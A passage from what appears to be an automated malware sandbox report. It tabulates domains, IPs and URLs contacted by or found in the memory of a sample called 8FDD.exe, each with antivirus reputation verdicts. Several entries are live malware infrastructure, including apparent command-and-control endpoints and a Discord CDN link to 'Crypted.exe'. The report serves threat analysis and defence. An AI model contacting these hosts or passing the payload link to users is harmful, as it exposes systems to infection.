          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?dg0%Avira URL Cloudsafe
          towerxxuytwi.xyz100%Avira URL Cloudmalware
          https://aka.ms/odirm0%Avira URL Cloudsafe
          https://foodypannyjsud.shop/api100%Avira URL Cloudmalware
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%Avira URL Cloudsafe
          https://api.msn.com/q0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-10%Avira URL Cloudsafe
          https://foodypannyjsud.shop/F9R100%Avira URL Cloudmalware
          https://foodypannyjsud.shop/pi100%Avira URL Cloudmalware
          https://support.mozilla.org/products/firefoxgro.all0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          evilos.cc
          		127.0.0.127
          		truetrueunknown
          gebeus.ru
          		58.151.148.90
          		truetrueunknown
          cdn.discordapp.com
          		162.159.133.233
          		truetrueunknown
          foodypannyjsud.shop
          		188.114.97.3
          		truetrueunknown
          mussangroup.com
          		185.149.100.242
          		truetrueunknown
          api.msn.com
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://gebeus.ru/tmp/index.phptrue
          • 17%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://cx5519.com/tmp/index.phptrue
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          contintnetksows.shoptrue
          • 17%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://evilos.cc/tmp/index.phptrue
          • 17%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          ellaboratepwsz.xyztrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          swellfrrgwwos.xyztrue
          • 17%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          foodypannyjsud.shoptrue
          • Avira URL Cloud: malware
          		unknown
          pedestriankodwu.xyztrue
          • Avira URL Cloud: malware
          		unknown
          towerxxuytwi.xyztrue
          • Avira URL Cloud: malware
          		unknown
          https://foodypannyjsud.shop/apitrue
          • Avira URL Cloud: malware
          		unknown
          http://office-techs.biz/tmp/index.phptrue
          • Avira URL Cloud: malware
          		unknown
          penetratedpoopp.xyztrue
          • Avira URL Cloud: malware
          		unknown
          potterryisiw.shoptrue
          • Avira URL Cloud: malware
          		unknown
          https://cdn.discordapp.com/attachments/1253399732433195008/1258946128448327812/Crypted.exe?ex=6689e473&is=668892f3&hm=8a4a5d7faf9a541161a67629af15ee492b44a297fba72b8c381671e290b63b29&true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://foodypannyjsud.shop/o8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/chrome_newtab8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/ac/?q=8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1710883230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.comexplorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/api)8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1712797791.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc948FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1712797791.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://word.office.comexplorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/Vh5j3kPoexplorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512992935.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505122702.0000000006B88000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://crl.rootca1.amazontrust.com/rootca1.crl08FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ocsp.rootca1.amazontrust.com0:8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20168FDD.exe, 00000006.00000003.2115840180.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.micrexplorer.exe, 00000001.00000000.1713660938.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.ecosia.org/newtab/8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/apiT8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2219073134.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220943576.0000000001987000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://foodypannyjsud.shop/apiS8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://support.microsof8FDD.exe, 00000006.00000003.2115840180.0000000003D4E000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/F98FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/ne8FDD.exe, 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://outlook.com_explorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000B.00000003.2512292120.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2501479783.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008DBE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.miexplorer.exe, 00000001.00000000.1713660938.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1712797791.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?dgexplorer.exe, 0000000B.00000003.2512292120.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2501479783.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505788300.0000000008DBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008DBE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e178FDD.exe, 00000006.00000003.2115840180.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.microexplorer.exe, 00000001.00000000.1710540741.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1710223246.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1711676695.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://aka.ms/odirmexplorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2512992935.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2505122702.0000000006B88000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://x1.c.lencr.org/08FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://x1.i.lencr.org/08FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/qexplorer.exe, 00000001.00000000.1710883230.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/F9R8FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://foodypannyjsud.shop/pi8FDD.exe, 00000006.00000002.2220921754.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://support.mozilla.org/products/firefoxgro.all8FDD.exe, 00000006.00000003.2142664060.0000000003E15000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://foodypannyjsud.shop/8FDD.exe, 00000006.00000003.2218999405.000000000197B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116192738.000000000191B000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2163929532.000000000197E000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000002.2220441395.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2163724848.0000000001978000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://ac.ecosia.org/autocomplete?q=8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1710883230.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.mexplorer.exe, 0000000B.00000003.2511610475.000000000908F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg8FDD.exe, 00000006.00000003.2142945532.000000000199F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://crt.rootca1.amazontrust.com/rootca1.cer0?8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/explorer.exe, 0000000B.00000003.2512292120.0000000008E9F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=8FDD.exe, 00000006.00000003.2116436627.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2116122876.0000000003D1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
